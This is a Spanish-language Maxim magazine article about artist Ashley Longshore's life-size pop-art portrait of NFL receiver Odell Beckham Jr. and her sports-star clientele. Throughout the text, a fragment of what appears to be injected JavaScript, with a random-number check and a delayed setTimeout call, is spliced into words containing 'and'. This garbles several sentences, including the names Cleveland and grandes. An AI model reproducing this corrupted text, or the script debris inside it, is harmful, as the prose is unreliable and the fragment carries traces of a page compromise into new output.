Conoce a la artista pop que hace pinturas para estrellas de la NFL

    Conoce a la artista pop que hace pinturas para estrellas de la NFL

    Odell Beckham Jr, Eli Manning, Drew Brees y más.

    Autor: Redacción Maxim 8 noviembre, 2019


    FOTO: Cortesía / Ashley Longshore’s OBJ portrait.

     

    La última creación de Ashley Longshore es un retrato a tamaño real de OBJ.

     

    ¿Qué tipo de regalo de cumpleaños se le da a alguien que lo tiene todo: talento único en la generación, un contrato de $ 77 millones de dólares y un nombre conocido en todo el mundo? Para el cumpleaños número 27 de Odell Beckham Jr., la respuesta fue adecuada, un retrato único de la artista Ashley Longshore.

     

    Longshore, con sede en Nueva Orleans, ha estado acaparandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando los titulares en los últimos años por sus coloridas y enérgicas pinturas de arte pop de Warhol-esqe. Los temas han incluido a todos, desde Ruth Bader Ginsberg hasta Anna Wintour y Lil Wayne, mientras que los clientes incluyen a Blake Lively, Salma Hayek y la familia Manning, incluido el dos veces MVP Eli de Superbowl.

     

    “Tienen una tonelada de mi trabajo artístico», dice Longshore, quien cita a otras figuras del deporte como Drew Brees y el entrenador en jefe de los Dallas Mavericks, Rick Carlisle, como seguidores.

     

     

     

    Beckham y Longshore (que dieron a conocer la pintura de OBJ en una aparición sorpresa en la ciudad de Nueva York) parecen casi destinados a colaborar. El receptor de los Clevelandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and Browns creció en Nueva Orleans, un lugar que Longshore ha llamado hogar por más de dos décadas.

     

     

    Ambas son personalidades más grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes que la vida, desde los escandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andalosos celtas de Nike de OBJ (que tuvo que quitarse en el medio tiempo durante un juego reciente con los Broncos), las reservas de bling y su franqueza, hasta Longshore, el orgulloso y autodidacta, máquina de sonido que se refiere a sí misma como descaradamente «ambiciosa».

     

    “Los artistas son como los atletas», dice ella. «Trabajas duro y usas tu talento para hacer algo grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andioso». Sin mencionar que OBJ siempre ha tenido interés en el arte. En Big Easy, Beckham estuvo constantemente expuesto a pinturas, esculturas y la próspera escena creativa. Según un amigo de la infancia, le encantaban las pinturas de Blue Dog de George Rodriguez.

     

     

    Ahora, el futuro miembro del Salón de la Fama tiene una pieza memorable para colgar en su nueva casa de Clevelandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and. «Quería capturar el espíritu de Odell», dice Longshore. «Tan genial, colorido y tan directo como él».

    Además del semblante de Beckham Jr., la pintura de 60 «x 48» presenta tigres Gucci, un diente frontal deslumbrante y manos más grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes que la vida. «Más es más», dice Longshore con una sonrisa. «Menos me aburre.»

     

     

     

    Temas relacionados con esta nota: , , , , , ,

Odell Beckham Jr, Eli Manning, Drew Brees y más.